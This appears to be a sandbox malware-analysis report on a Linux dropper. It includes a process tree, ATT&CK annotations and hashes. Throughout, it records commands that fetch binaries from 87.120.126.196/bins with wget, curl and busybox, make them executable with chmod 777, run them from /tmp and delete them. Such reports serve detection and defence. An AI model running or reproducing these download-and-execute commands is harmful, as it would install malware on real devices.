/bin/busybox/bin/busybox wget http://87.120.126.196/bins/CPPlc3Yzj8M2YktAvSEsKF5zPwSOKt0BfA2⤵PID:1633
-
-
/bin/chmodchmod 777 CPPlc3Yzj8M2YktAvSEsKF5zPwSOKt0BfA2⤵
- File and Directory Permissions Modification
PID:1634
-
-
/tmp/CPPlc3Yzj8M2YktAvSEsKF5zPwSOKt0BfA./CPPlc3Yzj8M2YktAvSEsKF5zPwSOKt0BfA2⤵
- Executes dropped EXE
PID:1635
-
-
/bin/rmrm CPPlc3Yzj8M2YktAvSEsKF5zPwSOKt0BfA2⤵PID:1636
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/oxUWvwhZOEoMoCgfzN0z8gldLt09ELl7Cw2⤵PID:1637
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/oxUWvwhZOEoMoCgfzN0z8gldLt09ELl7Cw2⤵
- Writes file to tmp directory
PID:1638
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/oxUWvwhZOEoMoCgfzN0z8gldLt09ELl7Cw2⤵PID:1639
-
-
/bin/chmodchmod 777 oxUWvwhZOEoMoCgfzN0z8gldLt09ELl7Cw2⤵
- File and Directory Permissions Modification
PID:1640
-
-
/tmp/oxUWvwhZOEoMoCgfzN0z8gldLt09ELl7Cw./oxUWvwhZOEoMoCgfzN0z8gldLt09ELl7Cw2⤵
- Executes dropped EXE
PID:1641
-
-
/bin/rmrm oxUWvwhZOEoMoCgfzN0z8gldLt09ELl7Cw2⤵PID:1642
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/OFYM3t3OdXEMZlp13fUl8vLz1Xy4Ybx5cb2⤵PID:1643
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/OFYM3t3OdXEMZlp13fUl8vLz1Xy4Ybx5cb2⤵
- Writes file to tmp directory
PID:1644
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/OFYM3t3OdXEMZlp13fUl8vLz1Xy4Ybx5cb2⤵PID:1645
-
-
/bin/chmodchmod 777 OFYM3t3OdXEMZlp13fUl8vLz1Xy4Ybx5cb2⤵
- File and Directory Permissions Modification
PID:1646
-
-
/tmp/OFYM3t3OdXEMZlp13fUl8vLz1Xy4Ybx5cb./OFYM3t3OdXEMZlp13fUl8vLz1Xy4Ybx5cb2⤵
- Executes dropped EXE
PID:1647
-
-
/bin/rmrm OFYM3t3OdXEMZlp13fUl8vLz1Xy4Ybx5cb2⤵PID:1648
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/aUFzTJBbmAYbPv9lME6JtPK1PKi4P2CT4k2⤵PID:1649
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/aUFzTJBbmAYbPv9lME6JtPK1PKi4P2CT4k2⤵
- Writes file to tmp directory
PID:1650
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/aUFzTJBbmAYbPv9lME6JtPK1PKi4P2CT4k2⤵PID:1651
-
-
/bin/chmodchmod 777 aUFzTJBbmAYbPv9lME6JtPK1PKi4P2CT4k2⤵
- File and Directory Permissions Modification
PID:1652
-
-
/tmp/aUFzTJBbmAYbPv9lME6JtPK1PKi4P2CT4k./aUFzTJBbmAYbPv9lME6JtPK1PKi4P2CT4k2⤵
- Executes dropped EXE
PID:1653
-
-
/bin/rmrm aUFzTJBbmAYbPv9lME6JtPK1PKi4P2CT4k2⤵PID:1654
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Ju8QBqA692Dp6a71dtDveu17PKqH4EQ6132⤵PID:1655
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Ju8QBqA692Dp6a71dtDveu17PKqH4EQ6132⤵
- Writes file to tmp directory
PID:1656
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Ju8QBqA692Dp6a71dtDveu17PKqH4EQ6132⤵PID:1657
-
-
/bin/chmodchmod 777 Ju8QBqA692Dp6a71dtDveu17PKqH4EQ6132⤵
- File and Directory Permissions Modification
PID:1658
-
-
/tmp/Ju8QBqA692Dp6a71dtDveu17PKqH4EQ613./Ju8QBqA692Dp6a71dtDveu17PKqH4EQ6132⤵
- Executes dropped EXE
PID:1659
-
-
/bin/rmrm Ju8QBqA692Dp6a71dtDveu17PKqH4EQ6132⤵PID:1660
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/HUV3uYejTB3G9yxm9AsJMvbGhfnIhIzLGp2⤵PID:1661
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/HUV3uYejTB3G9yxm9AsJMvbGhfnIhIzLGp2⤵
- Writes file to tmp directory
PID:1662
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/HUV3uYejTB3G9yxm9AsJMvbGhfnIhIzLGp2⤵PID:1663
-
-
/bin/chmodchmod 777 HUV3uYejTB3G9yxm9AsJMvbGhfnIhIzLGp2⤵
- File and Directory Permissions Modification
PID:1664
-
-
/tmp/HUV3uYejTB3G9yxm9AsJMvbGhfnIhIzLGp./HUV3uYejTB3G9yxm9AsJMvbGhfnIhIzLGp2⤵
- Executes dropped EXE
PID:1665
-
-
/bin/rmrm HUV3uYejTB3G9yxm9AsJMvbGhfnIhIzLGp2⤵PID:1666
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97